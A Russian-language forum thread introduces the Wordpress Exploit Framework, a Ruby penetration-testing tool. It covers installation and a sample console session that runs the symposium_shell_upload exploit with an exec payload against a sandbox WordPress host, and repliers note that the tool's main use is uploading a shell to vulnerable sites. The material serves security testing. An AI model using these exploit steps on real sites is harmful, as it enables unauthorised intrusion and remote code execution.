Wordpress Exploit Framework

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Приветствую! Недавно в сети попался любопытный фреймворк для проведения тестирования на проникновение в отношении Wordpress. В этой публикации, я хочу вас с ним ознакомить.

Называется он Wordpress Exploit Framework.

Написан инструмент на Ruby, включает в себя возможности для разработки собственных модулей и оказывает помощь в проведении пентеста Wordpress систем и сайтов.

Давайте приступим к установке фреймворка:

> git clone https://github.com/rastating/wordpress-exploit-framework

> cd wordpress-exploit-framework/

upload_2016-12-31_1-32-39.png


Для решения возникших в ходе установки проблем, советую посетить страницу разработчиков на github => https://github.com/rastating/wordpress-exploit-framework

Запустим фреймворк:

> ./wpxf.rb

upload_2016-12-31_1-33-21.png


Загрузка модуля в фреймворке позволит вам установить параметры с набором команд и просматривать информацию о модуле, используя команды фреймворка.

Ниже приведен пример того, как можно было бы загрузить symposium_shell_upload эксплойт-модуль, установить модуль и тип полезной нагрузки, затем выбрать необходимые параметры и запустить эксплойт против цели.

> wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

> wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

> wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

> wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::payloads::Exec:0x434d078>

> wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

> wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...

[-] Uploading the payload...

[-] Executing the payload...

[+] Result: Hello, world!

[+] Execution finished successfully

Команда:

> help

Покажет описание внутренних команд фреймворка:

upload_2016-12-31_1-34-55.png


Повторюсь, всю необходимую информацию о структуре фреймворка, решении возникших проблем и получении сведений о лицензии смотрим на странице разработчиков на github.

Спасибо за внимание.
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Если верно понял, то данный фрейм стартует после получения данных тем же wpsan. Основная задача - заливка shell на уязвимую систему.
 

Dosia

Green Team
08.12.2016
96
27
BIT
0
А перебирать уязвимости в данном фрейме возможно?
 
  • Нравится
Реакции: Dfun
K

kservice

Подскажите, а есть что-нибудь посвежее для поиска уязвимостей в Wordpress, WPScan давно не обновляется же?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Подскажите, а есть что-нибудь посвежее для поиска уязвимостей в Wordpress, WPScan давно не обновляется же?

обновляется регулярно. Обратите внимание на гит хаб (ниже)
https://github.com/wpscanteam/wpscan
Если не нравится wpscan, есть другие owasp-zap, w3af, nikto, skiphish, vega и т.д. Но wpscan не тратит много времени на поиск лишнего - он четко идет по заданному алгоритму, что помогает сократить время поиска уязвимости.
[doublepost=1483298540,1483296652][/doublepost]
А перебирать уязвимости в данном фрейме возможно?

Это не сканер, это для эксплуатции уязвимостей найденных другими средствами.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
[doublepost=1488537527,1488365807][/doublepost]подскажите что надо тут указать "set target_uri "[/quote]

Путь к Wordpress
 

vunya

Green Team
03.10.2017
26
8
BIT
0
апну тему
кто юзал ? делитесь опытом.
поставил, запустил всего много и не очень понятно чего и куда.
с виду на msf похоже )
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!